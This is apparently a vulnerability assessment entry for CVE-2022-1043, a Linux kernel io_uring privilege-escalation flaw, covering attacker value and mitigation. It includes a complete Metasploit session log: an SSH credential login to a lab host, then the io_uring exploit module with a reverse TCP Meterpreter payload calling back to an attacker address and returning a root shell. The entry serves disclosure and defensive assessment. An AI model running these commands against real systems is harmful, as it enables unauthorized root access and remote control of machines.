Low
CVE-2022-1043
CVE-2022-1043
Description
A flaw was found in the Linux kernel’s io_uring implementation. This flaw allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges.
Add Assessment
Technical Analysis
Description
This vulnerability exists in linux kernel’s io_uring implementation. This vuln allows an attacker with a local account to corrupt system memory, crash the system or escalate privileges in order to spawn a root shell.
Attacker Value & Exploitation
Github user, @jvoisin explained, user @minipli-oss, wrote a neat exploit for CVE-2022-1043, and it has the following advantages over your everyday Linux LPE:
- No hardcoded offsets
- No ROP
- Architecture-agnostic-ish
- Bypasses all existing mitigations, even out-of-kernel-ones like grsecurity (for version older than the exploit of course, since this class of vulnerabilities is now mitigated there) and LKRG.
The only drawback is that it only works on v5.12-rc3 to v5.14-rc7 a fairly small subset of the linux kernel.
If the system is vulnerable, exploitation is trivial. The neat, aforementioned exploit has been integrated into the Metasploit making getting a root shell a piece of cake:
msf6 auxiliary(scanner/ssh/ssh_login) > run rhosts=172.16.199.132 username=msfuser password=notpassword [*] 172.16.199.132:22 - Starting bruteforce [+] 172.16.199.132:22 - Success: 'msfuser:notpassword' 'uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux msfuser-virtual-machine 5.13.12-051312-generic #202108180838 SMP Wed Aug 18 08:41:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux ' [*] SSH session 1 opened (172.16.199.1:60829 -> 172.16.199.132:22) at 2023-02-01 10:59:16 -0500 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf6 auxiliary(scanner/ssh/ssh_login) > use linux/local/cve_2022_1043_io_uring_priv_esc [*] Using configured payload linux/x64/meterpreter/reverse_tcp msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set session 1 session => 1 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lhost 172.16.199.1 lhost => 172.16.199.1 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > set lport 4447 lport => 4447 msf6 exploit(linux/local/cve_2022_1043_io_uring_priv_esc) > run [!] SESSION may not be compatible with this module: [!] * incompatible session architecture: [*] Started reverse TCP handler on 172.16.199.1:4447 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. > 1 CPU required, detected: 2 [*] Writing '/tmp/.5Z1IxJt0' (282 bytes) ... [*] Launching exploit... [*] Sending stage (3045348 bytes) to 172.16.199.132 [+] Deleted /tmp/.5Z1IxJt0 [+] Deleted /tmp/.qfp5AH76BB [*] Meterpreter session 2 opened (172.16.199.1:4447 -> 172.16.199.132:49236) at 2023-02-01 10:59:51 -0500 meterpreter > getuid Server username: root meterpreter > sysinfo Computer : 172.16.199.132 OS : Ubuntu 22.04 (Linux 5.13.12-051312-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux
Defensive Suggestions
Not much to say here other don’t run a vulnerable kernel version, patch!
CVSS V3 Severity and Metrics
General Information
Vendors
- linux
Products
- linux kernel
Metasploit Modules
References
Miscellaneous
